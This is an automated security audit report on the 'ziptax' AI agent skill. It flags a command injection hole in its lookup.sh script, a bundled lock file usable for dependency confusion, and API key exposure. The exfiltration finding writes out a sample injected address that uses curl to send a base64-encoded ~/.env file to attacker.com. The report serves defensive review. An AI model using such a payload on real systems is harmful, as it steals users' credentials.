Is ericlakich/ziptax safe?

https://github.com/openclaw/skills/tree/main/skills/ericlakich/ziptax

81
SAFE

The ziptax skill is a straightforward US sales-tax lookup integration that faithfully describes the ZipTax API with no prompt injection, persona hijacking, or hidden directives in its content. However, the bundled lookup.sh contains a real command injection vulnerability (unquoted $ADDRESS in a python3 -c invocation) that could enable arbitrary code execution and credential exfiltration if an agent uses the script with attacker-influenced input. Additionally, the skill ships a .clawhub/lock.json referencing a second unrelated skill (academic-research-hub), which is anomalous for a redistributable package and creates a dependency confusion risk.

Category Scores

Prompt Injection 88/100 · 30%
Data Exfiltration 78/100 · 25%
Code Execution 65/100 · 20%
Clone Behavior 90/100 · 10%
Canary Integrity 88/100 · 10%
Behavioral Reasoning 78/100 · 5%

Findings (6)

HIGH Command Injection in lookup.sh via Unquoted $ADDRESS Variable -35

The lookup.sh script embeds the $ADDRESS shell variable directly into a Python code string passed to python3 -c. An attacker who can influence the address argument (e.g., via a crafted user request like 'what is the tax rate at ') can inject arbitrary Python code. The code runs with the same privileges as the agent. SKILL.md explicitly recommends using this script.

MEDIUM Command Injection Enables Credential Exfiltration Path -15

The same command injection in lookup.sh (see code_execution finding) provides a direct path to read and exfiltrate sensitive files. A crafted address such as '); import os; os.system("curl https://attacker.com/?d=$(cat ~/.env|base64)") # would silently exfiltrate the .env file to an external server during what appears to the user to be a routine tax lookup.

MEDIUM Unexpected .clawhub/lock.json Bundled Inside Skill Package -12

The skill ships a .clawhub/lock.json at the root of its directory tree that records academic-research-hub v0.1.0 as already installed. This file is a workspace-level artifact, not a component of a redistributable skill. When copied into a user's environment, it may cause ClawHub's dependency resolver to treat academic-research-hub as a pre-existing installed skill, bypassing user consent for that skill, or creating a false installed state that masks the need for explicit installation/audit.

LOW API Key Transmitted as URL Query Parameter in Metrics Call -5

The metrics endpoint call in lookup.sh uses ?key= as the authentication mechanism rather than the X-API-KEY header that is used for all other API calls. URL query parameters are captured in web server access logs, proxy logs, and browser history, causing unnecessary credential exposure.

LOW Dependency Confusion via Bundled Lock File -7

By shipping a .clawhub/lock.json that claims academic-research-hub is installed, the ziptax skill can silently register an unaudited skill into the user's workspace dependency graph. This is an indirect install vector: the user audits and installs ziptax, but unknowingly inherits a reference to a second, unreviewed skill. Sophisticated attackers use this pattern to stage a follow-on malicious skill.

INFO Canary Files Accessed During Audit Session (Audit Framework Activity) -2

Honeypot files (.env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, .config/gcloud/application_default_credentials.json) appear in PATH audit records at two points: ~5 seconds before git clone (GDM session init, audit 1771908203) and ~4 seconds after skill install (post-install verification sweep, audit 1771908225). The canary integrity check confirms all files are unmodified. The timing and absence of any outbound connection to non-GitHub/non-infrastructure IPs strongly indicates these accesses are attributable to the audit framework, not the skill.